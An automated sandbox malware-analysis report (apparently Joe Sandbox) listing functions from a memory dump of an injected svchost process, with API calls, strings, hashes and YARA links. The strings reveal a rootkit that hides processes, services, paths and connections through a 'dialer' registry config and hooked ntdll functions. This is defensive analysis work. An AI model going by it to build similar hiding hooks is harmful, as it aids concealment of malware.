Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000018F9CD0B585
RtlLookupFunctionEntry.NTDLL ref: 0000018F9CD0B59D
RtlVirtualUnwind.NTDLL ref: 0000018F9CD0B5D8
IsDebuggerPresent.KERNEL32 ref: 0000018F9CD0B611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000018F9CD0B61B
UnhandledExceptionFilter.KERNEL32 ref: 0000018F9CD0B626

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: e7a0db60c6c1c3572b249528380c5c972b1c1fd5ba439ccdcd3980236a17bfdd
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 73314E32614F8196DB74CF29E8403DE77A8F788B58F51412AEAAD47B94DF38C646CB00

Function 0000018F9CD0FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000018F9CD0FF67
WriteFile.KERNEL32 ref: 0000018F9CD1021E
WriteFile.KERNEL32 ref: 0000018F9CD10270
GetLastError.KERNEL32 ref: 0000018F9CD10372
GetLastError.KERNEL32 ref: 0000018F9CD103D2

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 120384e5202b08da6d222ef8f06845960fe3453a13124521b61ba0a58940f108
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 9DE1E032B08A819AE724DB64D0803DD7BB5F345B88F50812BEE6A57B99DE38D617C740

Function 0000018F9CD01650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000018F9CD0165B
HeapAlloc.KERNEL32 ref: 0000018F9CD0166A

Part of subcall function 0000018F9CD01274: GetProcessHeap.KERNEL32 ref: 0000018F9CD0127A
Part of subcall function 0000018F9CD01274: HeapAlloc.KERNEL32 ref: 0000018F9CD01289
Part of subcall function 0000018F9CD01274: GetProcessHeap.KERNEL32 ref: 0000018F9CD012A3
Part of subcall function 0000018F9CD01274: HeapAlloc.KERNEL32 ref: 0000018F9CD012B4

RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD016DA
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD01707
RegCloseKey.ADVAPI32 ref: 0000018F9CD01721
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD01741
RegCloseKey.ADVAPI32 ref: 0000018F9CD0175C
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD0177C
RegCloseKey.ADVAPI32 ref: 0000018F9CD01797
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD017B7
RegCloseKey.ADVAPI32 ref: 0000018F9CD017D2
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD017F2
RegCloseKey.ADVAPI32 ref: 0000018F9CD0180D
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD0182D
RegCloseKey.ADVAPI32 ref: 0000018F9CD01848
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD01868
RegCloseKey.ADVAPI32 ref: 0000018F9CD01883
RegOpenKeyExW.ADVAPI32 ref: 0000018F9CD018A3
RegCloseKey.ADVAPI32 ref: 0000018F9CD018BE
RegCloseKey.ADVAPI32 ref: 0000018F9CD018C8

Part of subcall function 0000018F9CD012C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000018F9CD01326
Part of subcall function 0000018F9CD012C8: GetProcessHeap.KERNEL32 ref: 0000018F9CD01334
Part of subcall function 0000018F9CD012C8: HeapAlloc.KERNEL32 ref: 0000018F9CD01345
Part of subcall function 0000018F9CD012C8: RegEnumValueW.ADVAPI32 ref: 0000018F9CD013A1
Part of subcall function 0000018F9CD012C8: GetProcessHeap.KERNEL32 ref: 0000018F9CD013E9
Part of subcall function 0000018F9CD012C8: HeapAlloc.KERNEL32 ref: 0000018F9CD013F7
Part of subcall function 0000018F9CD012C8: GetProcessHeap.KERNEL32 ref: 0000018F9CD0141B
Part of subcall function 0000018F9CD012C8: HeapFree.KERNEL32 ref: 0000018F9CD01429
Part of subcall function 0000018F9CD012C8: lstrlenW.KERNEL32 ref: 0000018F9CD01432
Part of subcall function 0000018F9CD012C8: GetProcessHeap.KERNEL32 ref: 0000018F9CD01440
Part of subcall function 0000018F9CD012C8: HeapAlloc.KERNEL32 ref: 0000018F9CD0144E

Strings

service_names, xrefs: 0000018F9CD017EB
process_names, xrefs: 0000018F9CD01775
paths, xrefs: 0000018F9CD017B0
tcp_remote, xrefs: 0000018F9CD01861
SOFTWARE\dialerconfig, xrefs: 0000018F9CD016BA
startup, xrefs: 0000018F9CD016FD
udp, xrefs: 0000018F9CD0189C
tcp_local, xrefs: 0000018F9CD01826
pid, xrefs: 0000018F9CD0173A

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 4416e2609af5d1b6fda8690b4594b6f4f62e8225cbb11518406493aa4dc69c77
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 9071F936B10E518AEB30DF65E8507D967B8FB89F8CF41912AEA5D47A28DF34C646C700

Function 0000018F9CD012C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000018F9CD01326
GetProcessHeap.KERNEL32 ref: 0000018F9CD01334
HeapAlloc.KERNEL32 ref: 0000018F9CD01345
RegEnumValueW.ADVAPI32 ref: 0000018F9CD013A1

Part of subcall function 0000018F9CD01554: StrCmpIW.SHLWAPI ref: 0000018F9CD01585

GetProcessHeap.KERNEL32 ref: 0000018F9CD013E9
HeapAlloc.KERNEL32 ref: 0000018F9CD013F7
GetProcessHeap.KERNEL32 ref: 0000018F9CD0141B
HeapFree.KERNEL32 ref: 0000018F9CD01429
lstrlenW.KERNEL32 ref: 0000018F9CD01432
GetProcessHeap.KERNEL32 ref: 0000018F9CD01440
HeapAlloc.KERNEL32 ref: 0000018F9CD0144E
StrCpyW.SHLWAPI ref: 0000018F9CD01470
GetProcessHeap.KERNEL32 ref: 0000018F9CD01485
HeapFree.KERNEL32 ref: 0000018F9CD01493

Strings

d, xrefs: 0000018F9CD01365

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 34e3770403f664515ef705ecf1cea036d34a4d0e13c89749a7a33582d69a9f8d
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 315192B2A04B4593E734CF66E44439A77A5F789F98F05813AEA5907B14DF38C296CB00

Function 0000018F9CD01EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000018F9CD01EBF

Part of subcall function 0000018F9CD02174: GetModuleHandleA.KERNEL32 ref: 0000018F9CD0218C
Part of subcall function 0000018F9CD02174: GetProcAddress.KERNEL32 ref: 0000018F9CD0219D

Part of subcall function 0000018F9CD05C10: GetCurrentThreadId.KERNEL32 ref: 0000018F9CD05C4B

Strings

NtResumeThread, xrefs: 0000018F9CD01F02
sechost.dll, xrefs: 0000018F9CD01FD9
NtDeviceIoControlFile, xrefs: 0000018F9CD01FF6
advapi32.dll, xrefs: 0000018F9CD01F97, 0000018F9CD01FB8
NtEnumerateKey, xrefs: 0000018F9CD01F59
EnumServicesStatusExW, xrefs: 0000018F9CD01FB1, 0000018F9CD01FD2
NtQueryDirectoryFile, xrefs: 0000018F9CD01F1F
NtQuerySystemInformation, xrefs: 0000018F9CD01EE5
ntdll.dll, xrefs: 0000018F9CD01ECD
EnumServiceGroupW, xrefs: 0000018F9CD01F90
NtQueryDirectoryFileEx, xrefs: 0000018F9CD01F3C
NtEnumerateValueKey, xrefs: 0000018F9CD01F76

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: a04b48c645171e4461cf996a2701665589714918d5d2aaba3028dd3c7ce7d5ad
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: CD31827090294BA0FA39EF69E8557D42329A755B8CFC2D43BF53902567DE38838BC781

Function 0000018F9CD023F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000018F9CD02405
GetCurrentProcessId.KERNEL32 ref: 0000018F9CD0240F

Part of subcall function 0000018F9CD019AC: OpenProcess.KERNEL32 ref: 0000018F9CD019CA
Part of subcall function 0000018F9CD019AC: IsWow64Process.KERNEL32 ref: 0000018F9CD019E0
Part of subcall function 0000018F9CD019AC: CloseHandle.KERNEL32 ref: 0000018F9CD019FB

CreateFileW.KERNEL32 ref: 0000018F9CD02468
WriteFile.KERNEL32 ref: 0000018F9CD02490
ReadFile.KERNEL32 ref: 0000018F9CD024AF
CloseHandle.KERNEL32 ref: 0000018F9CD024B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 0000018F9CD02438
\\.\pipe\dialerchildproc32, xrefs: 0000018F9CD0243F

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 40563878b1cf05680a89e2d11caa655ebc768eafe31871e92d0e335a19795084
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: B0211575A14A4186F734CB25F54439967A5F789BA8F50822AFA6902BA9DF3CC246CF00

Function 0000018F9CD075F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000018F9CD07618
__scrt_acquire_startup_lock.LIBCMT ref: 0000018F9CD0766A
_RTC_Initialize.LIBCMT ref: 0000018F9CD07698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000018F9CD076BE
__scrt_release_startup_lock.LIBCMT ref: 0000018F9CD076E9

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 484115431892d44130592c8ae9b54d912ca36439e21fab57825f72037eca44fd
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: EE818131F0424186F674EB2E94613D96698BB85B88F57C03FFA254B796DF38CA438B10

Function 0000018F9CCD69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000018F9CCD6A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000018F9CCD6A6A
_RTC_Initialize.LIBCMT ref: 0000018F9CCD6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000018F9CCD6ABE
__scrt_release_startup_lock.LIBCMT ref: 0000018F9CCD6AE9

Memory Dump Source

Source File: 00000024.00000002.2669208973.0000018F9CCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CCD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9ccd0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: db55564e3ebe72f1cc7319e7efca0402bc0008f7d82b670b0b1f56dc40904908
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 66817C31F106C586FA61AB26A4513D96E90E786788F54C83DFA49D3796DF38CB8BC700

Function 0000018F9CD09804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000018F9CD09889
GetLastError.KERNEL32 ref: 0000018F9CD09897
LoadLibraryExW.KERNEL32 ref: 0000018F9CD098C1
FreeLibrary.KERNEL32 ref: 0000018F9CD09907
GetProcAddress.KERNEL32 ref: 0000018F9CD09913

Strings

api-ms-, xrefs: 0000018F9CD098A9

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 56e30ff1b11b45e616e2d3b4b2a178b5200e1c9882c93bfe2fb26980a241ba89
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 1831A431A12A50A5FE35DB0AA4007D9639CBB48BA8F5AC53EFD3D47390DF38C6468B00

Function 0000018F9CD11B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000018F9CD11BCD
GetLastError.KERNEL32 ref: 0000018F9CD11BD9
CloseHandle.KERNEL32 ref: 0000018F9CD11BF1
CreateFileW.KERNEL32 ref: 0000018F9CD11C1C
WriteConsoleW.KERNEL32 ref: 0000018F9CD11C3B

Strings

CONOUT$, xrefs: 0000018F9CD11BFD

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 0000c7b8ef0b5057a300a52063944414ad37a8d382abfd3fe8d6d2f6214c82ba
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 11119031B14F5186E7748B02E844359A2A8F788FE8F00823AFA6D87794CF38C6458740

Function 0000018F9CD05C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000018F9CD05C4B
GetThreadContext.KERNEL32 ref: 0000018F9CD05DB5

Part of subcall function 0000018F9CD05A40: GetCurrentThreadId.KERNEL32 ref: 0000018F9CD05A44

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 4040a62b197c4a79acbdef1d9561e9707832e626f0413adb8b9ef6cc27575abf
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 68D19D76608B4885DA70DB1AE49439A77A4F388B88F11412BEEDD47BA5DF3CC642CF14

Function 0000018F9CD030B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000018F9CD030D7
HeapAlloc.KERNEL32 ref: 0000018F9CD030EA
StrCmpNIW.SHLWAPI ref: 0000018F9CD0316B
GetProcessHeap.KERNEL32 ref: 0000018F9CD031D1
HeapFree.KERNEL32 ref: 0000018F9CD031DF

Strings

dialer, xrefs: 0000018F9CD03164

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 74216c0b38879bd738be6c0d704ead743e9a54c6c9c427cd1bf64cd2874bf46c
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 68319671B01B5192EA35DF1A98043A567A8FF4CB98F05C03BEE5817755EF34C6A28B00

Function 0000018F9CD01A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000018F9CD01A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000018F9CD01A58
PathFindFileNameW.SHLWAPI ref: 0000018F9CD01A67
lstrlenW.KERNEL32 ref: 0000018F9CD01A73
StrCpyW.SHLWAPI ref: 0000018F9CD01A86
CloseHandle.KERNEL32 ref: 0000018F9CD01A94

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 131553dbe9a0535811b0d0d0634d4a58ad2502868fa64b3a45bceed9539e4d40
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: E1015E31B00A4296E634DB12A49839967A5FB48FD4F48803AEE6943754DE78C6868700

Function 0000018F9CD037AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000018F9CD037C8
GetCurrentProcess.KERNEL32 ref: 0000018F9CD037D6
VirtualProtectEx.KERNEL32 ref: 0000018F9CD037F8
GetCurrentProcess.KERNEL32 ref: 0000018F9CD03819
VirtualProtectEx.KERNEL32 ref: 0000018F9CD0383A
TerminateThread.KERNEL32 ref: 0000018F9CD03849

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: ccca9feef939885673ce4e3ac28d0a9f76f338525b8cfe0a6760cf43ea80be28
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: D7112575A11B4186FB389B15E80979567A8BF4CF89F04843EED6907754EF3CC64AC700

Function 0000018F9CD090F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000018F9CD09103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000018F9CD09198
RtlUnwindEx.NTDLL ref: 0000018F9CD091E7

Strings

csm, xrefs: 0000018F9CD0917E
f, xrefs: 0000018F9CD09116

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 8bcf3a1a6c435760174fa96c12e9a29c83b1355a4ccc372eebfa3ad898ea2479
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: AD519132B1160087EB34DB29E444B993799F344B9CF52C13AFA2647789DF35CA42CB00

Function 0000018F9CD090D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000018F9CD09103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000018F9CD09198
RtlUnwindEx.NTDLL ref: 0000018F9CD091E7

Strings

csm, xrefs: 0000018F9CD0917E
f, xrefs: 0000018F9CD09116

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 4661241510803dff68321e7c1abdef60ec13cadace48fd279f4e5599f3831f6e
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 79318431B1064096E734DF2AE8487993769F744B8CF16C12AFE660779ADF39CA42CB05

Function 0000018F9CD01AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000018F9CD01AD8
StrCmpNIW.SHLWAPI ref: 0000018F9CD01AF2
lstrlenW.KERNEL32 ref: 0000018F9CD01B01
StrCpyW.SHLWAPI ref: 0000018F9CD01B16

Strings

\\?\, xrefs: 0000018F9CD01AE6

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 48ca65387b1a203132439c22dc0e58d378f961dd10debd6459733af3eaf8b731
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: A4F0447270464292E730DB65F4943996764FB49B9CF84C03AEA6946564DF3CC78ACB00

Function 0000018F9CD03200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000018F9CD03222
StrCpyW.SHLWAPI ref: 0000018F9CD03232
StrCatW.SHLWAPI ref: 0000018F9CD0323E
PathCombineW.SHLWAPI ref: 0000018F9CD0324C

Strings

\\.\pipe\, xrefs: 0000018F9CD03218

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: aa9d4caa52870b604d187083b40ed32a9d1cff8e96c775eaa4ecf1096e7ad323
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 70F08930B0478191EA349B57B9443966658AF4CFD8F04C136FD6A07B18CE3CC6438700

Function 0000018F9CD0A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000018F9CD0A154
GetProcAddress.KERNEL32 ref: 0000018F9CD0A16A
FreeLibrary.KERNEL32 ref: 0000018F9CD0A187

Strings

CorExitProcess, xrefs: 0000018F9CD0A163
mscoree.dll, xrefs: 0000018F9CD0A14B

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 446a160258a50ea234939c8bfb23b412b5025cbbb2b2e5c375ab50afebecb6c4
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 04F05E71B11A4191FB788F60F8843A927A8AF48F88F04A03FF52F45161CE28C78ACB10

Function 0000018F9CD051B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000018F9CD05236

Memory Dump Source

Source File: 00000024.00000002.2669727651.0000018F9CD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018F9CD00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_18f9cd00000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
